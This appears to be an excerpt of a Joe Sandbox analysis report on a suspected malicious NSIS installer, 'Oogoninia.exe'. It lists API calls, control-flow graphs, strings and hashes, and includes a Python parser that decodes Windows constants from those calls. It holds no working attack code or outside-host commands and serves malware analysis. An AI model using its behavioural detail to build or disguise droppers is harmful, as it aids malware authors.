                                                                                                                                                                                    • GetClassInfoA.USER32(00000000,RichEdit20A,007A16E0), ref: 00403963
                                                                                                                                                                                    • GetClassInfoA.USER32(00000000,RichEdit,007A16E0), ref: 00403970
                                                                                                                                                                                    • RegisterClassA.USER32(007A16E0), ref: 00403979
                                                                                                                                                                                    • DialogBoxParamA.USER32(?,00000000,00403AB2,00000000), ref: 00403998
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1191289974.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191407654.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.000000000077A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.000000000077F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.0000000000784000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.0000000000787000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.000000000079F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.00000000007A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.00000000007C0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007C3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007C5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007D3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007DC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                    • String ID: "C:\Users\user\Desktop\Oogoninia.exe"$.DEFAULT\Control Panel\International$.exe$1033$@y$C:\Users\user\AppData\Local\Temp\$C:\Users\user\slavelivets$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                                                                                                    • API String ID: 1975747703-1882387007
                                                                                                                                                                                    • Opcode ID: 72abac218aef0aa68c8201db2a2c7bc2da9bafc71593619d8738dd7e58f1acdc
                                                                                                                                                                                    • Instruction ID: 69823c21e20ed545a36681f3e22a73ce5ba8c54c43716b07ce110ef4df70eff0
                                                                                                                                                                                    • Opcode Fuzzy Hash: 72abac218aef0aa68c8201db2a2c7bc2da9bafc71593619d8738dd7e58f1acdc
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1361D6B5544240AEE310BF619C45F3B3AACEB85789F40857FF941B22E2D77D9D018A2D

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
• Graph: [rendered control-flow graph not preserved; first basic block 402cfa-402d48, API calls listed under APIs below]
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00402D0B
                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Oogoninia.exe,00000400), ref: 00402D27
                                                                                                                                                                                      • Part of subcall function 00405A13: GetFileAttributesA.KERNELBASE(?,00402D3A,C:\Users\user\Desktop\Oogoninia.exe,80000000,?), ref: 00405A17
                                                                                                                                                                                      • Part of subcall function 00405A13: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405A39
                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,007AA000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Oogoninia.exe,C:\Users\user\Desktop\Oogoninia.exe,80000000,?), ref: 00402D73
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • Null, xrefs: 00402DF1
                                                                                                                                                                                    • C:\Users\user\Desktop\Oogoninia.exe, xrefs: 00402D11, 00402D20, 00402D34, 00402D54
                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00402D01
                                                                                                                                                                                    • C:\Users\user\Desktop, xrefs: 00402D55, 00402D5A, 00402D60
                                                                                                                                                                                    • "C:\Users\user\Desktop\Oogoninia.exe", xrefs: 00402CFA
                                                                                                                                                                                    • Inst, xrefs: 00402DDF
                                                                                                                                                                                    • Error launching installer, xrefs: 00402D4A
                                                                                                                                                                                    • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402ED2
                                                                                                                                                                                    • soft, xrefs: 00402DE8
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                                                                    • String ID: "C:\Users\user\Desktop\Oogoninia.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Oogoninia.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                                                                                                                                    • API String ID: 4283519449-3195185465
                                                                                                                                                                                    • Opcode ID: 01abee4385eb3164d7f4254af187e376370b625cc9aa48c6f885a033e7c9399e
                                                                                                                                                                                    • Instruction ID: 3261349ff2f4a6e0e52cb66aedc5a428c749111a9fc88119453a55b84fe8b48b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 01abee4385eb3164d7f4254af187e376370b625cc9aa48c6f885a033e7c9399e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9A510671940215AFDB119F60DE89B9E7BB8EB44364F20413BF904B62D1D7BC8D408B9D

Control-flow Graph (basic blocks listed as node: address range, calls made in the block; edges listed as predecessor->successor)
• 600: 401759-40177c, call 402ace, call 40587f
• 605: 401786-401798, call 405da0, call 405812, lstrcatA
• 606: 40177e-401784, call 405da0
• 611: 40179d-4017a3, call 40600b
• 616: 4017a8-4017ac
• 617: 4017ae-4017b8, call 4060a4
• 618: 4017df-4017e2
• 626: 4017ca-4017dc
• 627: 4017ba-4017c8, CompareFileTime
• 620: 4017e4-4017e5, call 4059ee
• 621: 4017ea-401806, call 405a13
• 628: 401808-40180b
• 629: 40187e-4018a7, call 404fb9, call 402f33
• 630: 401860-40186a, call 404fb9
• 631: 40180d-40184f, call 405da0 * 2, call 405dc2, call 405da0, call 405596
• 643: 4018a9-4018ad
• 644: 4018af-4018bb, SetFileTime
• 641: 401873-401879
• 663: 401855-401856
• 645: 402967
• 647: 4018c1-4018cc, CloseHandle
• 650: 402969-40296d
• 648: 4018d2-4018d5
• 649: 40295e-402961
• 652: 4018d7-4018e8, call 405dc2, lstrcatA
• 653: 4018ea-4018ed, call 405dc2
• 659: 4018f2-4022d8
• 664: 4022dd-4022e2
• 665: 4022d8, call 405596
• 666: 401858-401859
• Edges: 600->605 600->606 605->611 606->611 611->616 616->617 616->618 617->626 617->627 618->620 618->621 620->621 621->628 621->629 626->618 627->626 628->630 628->631 629->643 629->644 630->641 631->616 631->663 641->645 643->644 643->647 644->647 645->650 647->648 647->649 648->652 648->653 649->645 652->659 659->664 659->665 663->641 663->666 664->650 665->664 666->630
APIs
• lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\slavelivets,00000000,00000000,00000031), ref: 00401798
• CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\slavelivets,00000000,00000000,00000031), ref: 004017C2
  • Part of subcall function 00405DA0: lstrcpynA.KERNEL32(?,?,00000400,0040322E,Leafier Setup,NSIS Error), ref: 00405DAD
  • Part of subcall function 00404FB9: lstrlenA.KERNEL32(0079DD20,00000000,0078FCF8,766B23A0,?,?,?,?,?,?,?,?,?,0040306B,00000000,?), ref: 00404FF2
  • Part of subcall function 00404FB9: lstrlenA.KERNEL32(0040306B,0079DD20,00000000,0078FCF8,766B23A0,?,?,?,?,?,?,?,?,?,0040306B,00000000), ref: 00405002
  • Part of subcall function 00404FB9: lstrcatA.KERNEL32(0079DD20,0040306B,0040306B,0079DD20,00000000,0078FCF8,766B23A0), ref: 00405015
  • Part of subcall function 00404FB9: SetWindowTextA.USER32(0079DD20,0079DD20), ref: 00405027
  • Part of subcall function 00404FB9: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040504D
  • Part of subcall function 00404FB9: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405067
  • Part of subcall function 00404FB9: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405075
Strings
Memory Dump Source
• Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1191289974.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191407654.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.000000000077A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.000000000077F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.0000000000784000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.0000000000787000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.000000000079F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.00000000007A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.00000000007C0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007C3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007C5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007D3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007DC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007E2000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
Similarity
• API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
• String ID: C:\Users\user\AppData\Local\Temp\nsqBBFB.tmp$C:\Users\user\AppData\Local\Temp\nsqBBFB.tmp\System.dll$C:\Users\user\slavelivets$Call
• API String ID: 1941528284-3758952849
• Opcode ID: 17cbd14428586f76d7af50b729a9077a322d321e92e24f8c2541e02e22effdf4
• Instruction ID: dbbb128bf7935f0aed0e50e9380fc9841c9442f81e714e1827c6660095eaabca
• Opcode Fuzzy Hash: 17cbd14428586f76d7af50b729a9077a322d321e92e24f8c2541e02e22effdf4
• Instruction Fuzzy Hash: FE41E772910515BACB107BB5CC49DAF7AB9EF45368B20C23BF121F10E1C77C8A418A6D

Control-flow Graph (basic blocks listed as node: address range, calls made in the block; edges listed as predecessor->successor)
• 667: 40547f-4054ca, CreateDirectoryA
• 668: 4054d0-4054dd, GetLastError
• 669: 4054cc-4054ce
• 670: 4054f7-4054f9
• 671: 4054df-4054f3, SetFileSecurityA
• 672: 4054f5, GetLastError
• Edges: 667->668 667->669 668->670 668->671 669->670 671->669 671->672 672->670
APIs
• CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004054C2
• GetLastError.KERNEL32 ref: 004054D6
• SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004054EB
• GetLastError.KERNEL32 ref: 004054F5
Strings
Memory Dump Source
• Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
Similarity
• API ID: ErrorLast$CreateDirectoryFileSecurity
• String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$ds@$ts@
• API String ID: 3449924974-2230009264
• Opcode ID: f69d3160a82a2859f106a017fa20b71bd819ec85ae22b078452fa26fbc967781
• Instruction ID: 09fe99030eccae78cb9d2ce19bbf77f9f972de75acbbd1990c032815ad2a971a
• Opcode Fuzzy Hash: f69d3160a82a2859f106a017fa20b71bd819ec85ae22b078452fa26fbc967781
• Instruction Fuzzy Hash: 2F010871D14259EADF119BA4C944BEFBFB8EB14315F00417AE904B6280E378A644CFAA

Control-flow Graph

APIs
• GetDC.USER32(?), ref: 00401D98
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DB2
• MulDiv.KERNEL32(00000000,00000000), ref: 00401DBA
• ReleaseDC.USER32(?,00000000), ref: 00401DCB
• CreateFontIndirectA.GDI32(0040A7F0), ref: 00401E1A
Strings
Memory Dump Source
• Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
Similarity
• API ID: CapsCreateDeviceFontIndirectRelease
• String ID: Times New Roman
• API String ID: 3808545654-927190056
• Opcode ID: 648d7b0dc9db80ea036042f47a1e498ac7e57b814f90c6129580178fecebfba8
• Instruction ID: 37723da549b7de6e047f5ddf6566bf04a0332ae81d9da388354d8b2e576e77f8
• Opcode Fuzzy Hash: 648d7b0dc9db80ea036042f47a1e498ac7e57b814f90c6129580178fecebfba8
• Instruction Fuzzy Hash: 3A015272948340AFE7006B70AE49F9A3FF4AB55315F10847AF241B62E2C6B904569B3E
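The "APIs" lines in the function listings above all share one layout: API name, module, the argument values Joe Sandbox recovered (8 hex digits for integers, "?" for unknown) and the call-site address after "ref:". Several of the arguments are Windows constants that are easier to triage once decoded: the 80000007 passed to SetFileSecurityA, the 00000008 passed to LoadLibraryExA, the 00001004 / 00001007 / 00001013 window messages sent by SendMessageA and the 0000005A index given to GetDeviceCaps. The following Python parser is an added example for this page, not code from Joe Sandbox or from the analysed sample; the sample input is copied from the API lines in this report, and the constant names come from the Windows SDK headers (SECURITY_INFORMATION bits, LoadLibraryEx flags, ListView messages, GetDeviceCaps indices). The choice of which argument to decode for which API is an assumption made by this example.

```python
"""Parse the "APIs" lines of a Joe Sandbox function listing and decode the
well-known Windows constants among the arguments (added example; not Joe
Sandbox code and not code from the analysed sample)."""
import re
from dataclasses import dataclass, field

# Sample input: API lines copied from the function listings in this report.
SAMPLE_LINES = r"""
• lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\slavelivets,00000000,00000000,00000031), ref: 00401798
• CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\slavelivets,00000000,00000000,00000031), ref: 004017C2
• SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040504D
• CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004054C2
• GetLastError.KERNEL32 ref: 004054D6
• SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004054EB
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DB2
• LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 0040612F
"""

# One report line: "• Api.MODULE(arg,arg,...), ref: 0040XXXX" (argument list optional).
API_LINE = re.compile(
    r"^\s*•?\s*(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?"
    r"\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# Constant tables (values from the Windows SDK headers).
SECURITY_INFORMATION = {
    0x00000001: "OWNER_SECURITY_INFORMATION",
    0x00000002: "GROUP_SECURITY_INFORMATION",
    0x00000004: "DACL_SECURITY_INFORMATION",
    0x00000008: "SACL_SECURITY_INFORMATION",
    0x80000000: "PROTECTED_DACL_SECURITY_INFORMATION",
}
LOAD_LIBRARY_FLAGS = {
    0x00000001: "DONT_RESOLVE_DLL_REFERENCES",
    0x00000002: "LOAD_LIBRARY_AS_DATAFILE",
    0x00000008: "LOAD_WITH_ALTERED_SEARCH_PATH",
    0x00000800: "LOAD_LIBRARY_SEARCH_SYSTEM32",
}
LISTVIEW_MESSAGES = {0x1004: "LVM_GETITEMCOUNT", 0x1007: "LVM_INSERTITEMA", 0x1013: "LVM_ENSUREVISIBLE"}
DEVICE_CAPS = {88: "LOGPIXELSX", 90: "LOGPIXELSY"}


def decode_flags(value, table):
    """Expand a bit mask into its named bits; unknown bits are kept as hex."""
    names = [name for bit, name in table.items() if value & bit]
    rest = value & ~sum(table)
    if rest:
        names.append(f"0x{rest:08x}")
    return "|".join(names) if names else "0"


# (API name, zero-based argument index) -> decoder for that argument.
# Which argument carries the constant is this example's assumption.
ARG_DECODERS = {
    ("SetFileSecurityA", 1): lambda v: decode_flags(v, SECURITY_INFORMATION),
    ("LoadLibraryExA", 2): lambda v: decode_flags(v, LOAD_LIBRARY_FLAGS),
    ("SendMessageA", 1): lambda v: LISTVIEW_MESSAGES.get(v, f"msg 0x{v:04x}"),
    ("GetDeviceCaps", 1): lambda v: DEVICE_CAPS.get(v, f"index {v}"),
}


@dataclass
class ApiCall:
    api: str
    module: str
    args: list
    ref: int
    decoded: dict = field(default_factory=dict)


def parse_arg(raw):
    """Joe Sandbox prints integers as 8 hex digits (optionally signed); anything else stays a string."""
    raw = raw.strip()
    if re.fullmatch(r"-?[0-9A-Fa-f]{8}", raw):
        return int(raw, 16)
    return raw


def parse_api_line(line):
    """Return an ApiCall for one report line, or None if the line is not an API line."""
    m = API_LINE.match(line)
    if not m:
        return None
    args = [parse_arg(a) for a in m["args"].split(",")] if m["args"] else []
    call = ApiCall(m["api"], m["module"], args, int(m["ref"], 16))
    for i, value in enumerate(args):
        decoder = ARG_DECODERS.get((call.api, i))
        if decoder and isinstance(value, int):
            call.decoded[i] = decoder(value)
    return call


def parse_listing(text):
    """Parse every API line in a block of report text, skipping everything else."""
    return [c for c in (parse_api_line(l) for l in text.splitlines()) if c is not None]


def notable_calls(calls):
    """(ref, api, decoded arguments) for every call that had a constant decoded."""
    return [(c.ref, c.api, c.decoded) for c in calls if c.decoded]


if __name__ == "__main__":
    for ref, api, decoded in notable_calls(parse_listing(SAMPLE_LINES)):
        print(f"{ref:08x} {api} {decoded}")
```

Run on the lines above it reports that the temporary directory is created with an owner, group and protected DACL set (80000007), that the DLL is loaded with LOAD_WITH_ALTERED_SEARCH_PATH (00000008), that the SendMessageA at 0040504D is an LVM_GETITEMCOUNT to the installer's list view and that the GetDeviceCaps index is LOGPIXELSY, which is what the NSIS stub's UI code does; only the raw values are in the report, the names are the decoder's.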

Control-flow Graph (basic blocks listed as node: address range, calls made in the block; edges listed as predecessor->successor)
• 682: 4060cb-4060eb, GetSystemDirectoryA
• 683: 4060ed
• 684: 4060ef-4060f1
• 685: 406101-406103
• 686: 4060f3-4060fb
• 687: 406104-406136, wsprintfA, LoadLibraryExA
• 688: 4060fd-4060ff
• Edges: 682->683 682->684 683->684 684->685 684->686 685->687 686->685 686->688 688->687
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004060E2
                                                                                                                                                                                    • wsprintfA.USER32 ref: 0040611B
                                                                                                                                                                                    • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 0040612F
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1191289974.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191407654.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                                                                    • String ID: %s%s.dll$UXTHEME$\
                                                                                                                                                                                    • API String ID: 2200240437-4240819195
                                                                                                                                                                                    • Opcode ID: 38f932dad6d10820f3564912fa7e39c047c8ada2afd73a6a353afcde48b08f1a
                                                                                                                                                                                    • Instruction ID: e39d6de12310bdbc02ec2e887020ee50980fcceaee6e7f6f8e64b4e94942106c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 38f932dad6d10820f3564912fa7e39c047c8ada2afd73a6a353afcde48b08f1a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 80F0FC30A40115A6EF1497A4DC0DFEB365CAB08305F140176A547E51D2D5B8E9248B69

Control-flow Graph

control_flow_graph 689 402f33-402f47 690 402f50-402f59 689->690 691 402f49 689->691 692 402f62-402f67 690->692 693 402f5b 690->693 691->690 694 402f77-402f84 call 403122 692->694 695 402f69-402f72 call 403138 692->695 693->692 699 403110 694->699 700 402f8a-402f8e 694->700 695->694 701 403112-403113 699->701 702 402f94-402fba GetTickCount 700->702 703 4030bb-4030bd 700->703 706 40311b-40311f 701->706 707 402fc0-402fc8 702->707 708 403118 702->708 704 4030fd-403100 703->704 705 4030bf-4030c2 703->705 711 403102 704->711 712 403105-40310e call 403122 704->712 705->708 713 4030c4 705->713 709 402fca 707->709 710 402fcd-402fdb call 403122 707->710 708->706 709->710 710->699 722 402fe1-402fea 710->722 711->712 712->699 723 403115 712->723 716 4030c7-4030cd 713->716 719 4030d1-4030df call 403122 716->719 720 4030cf 716->720 719->699 726 4030e1-4030ed call 405aba 719->726 720->719 725 402ff0-403010 call 40621c 722->725 723->708 731 4030b3-4030b5 725->731 732 403016-403029 GetTickCount 725->732 733 4030b7-4030b9 726->733 734 4030ef-4030f9 726->734 731->701 735 40302b-403033 732->735 736 40306e-403070 732->736 733->701 734->716 737 4030fb 734->737 738 403035-403039 735->738 739 40303b-40306b MulDiv wsprintfA call 404fb9 735->739 740 403072-403076 736->740 741 4030a7-4030ab 736->741 737->708 738->736 738->739 739->736 742 403078-40307f call 405aba 740->742 743 40308d-403098 740->743 741->707 744 4030b1 741->744 749 403084-403086 742->749 747 40309b-40309f 743->747 744->708 747->725 750 4030a5 747->750 749->733 751 403088-40308b 749->751 750->708 751->747
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1191289974.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191407654.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.000000000077A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.000000000077F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.0000000000784000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.0000000000787000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.000000000079F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.00000000007A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.00000000007C0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007C3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007C5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007D3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007DC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007E2000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
Similarity
• API ID: CountTick$wsprintf
• String ID: ... %d%%
• API String ID: 551687249-2449383134
• Opcode ID: 85c538cc075ba04794855290aa18cdf04ceba737772e139ba8f68ecbd5a835b1
• Instruction ID: c8fbb3e8d9104581ad396ff7879acfc5b753e67115e275f424ba67d933986381
• Opcode Fuzzy Hash: 85c538cc075ba04794855290aa18cdf04ceba737772e139ba8f68ecbd5a835b1
• Instruction Fuzzy Hash: 6551A27280121AABCB10DF65DA44A9F7BB8EF44756F10413BF800B72C5C7788E51DBAA

Control-flow Graph

control_flow_graph 752 4023d3-402419 call 402bc3 call 402ace * 2 RegCreateKeyExA 759 40295e-40296d 752->759 760 40241f-402427 752->760 762 402437-40243a 760->762 763 402429-402436 call 402ace lstrlenA 760->763 764 40243c-40244d call 402aac 762->764 765 40244e-402451 762->765 763->762 764->765 770 402462-402476 RegSetValueExA 765->770 771 402453-40245d call 402f33 765->771 774 402478 770->774 775 40247b-402555 RegCloseKey 770->775 771->770 774->775 775->759 777 402729-402730 775->777 777->759
APIs
• RegCreateKeyExA.KERNELBASE(00000000,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402411
• lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsqBBFB.tmp,00000023,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402431
• RegSetValueExA.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsqBBFB.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 0040246E
• RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsqBBFB.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 0040254F
Strings
Memory Dump Source
• Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1191289974.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191407654.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.000000000077A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.000000000077F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.0000000000784000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.0000000000787000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.000000000079F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.00000000007A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.00000000007C0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007C3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007C5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007D3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007DC000.00000002.00000001.01000000.00000003.sdmp
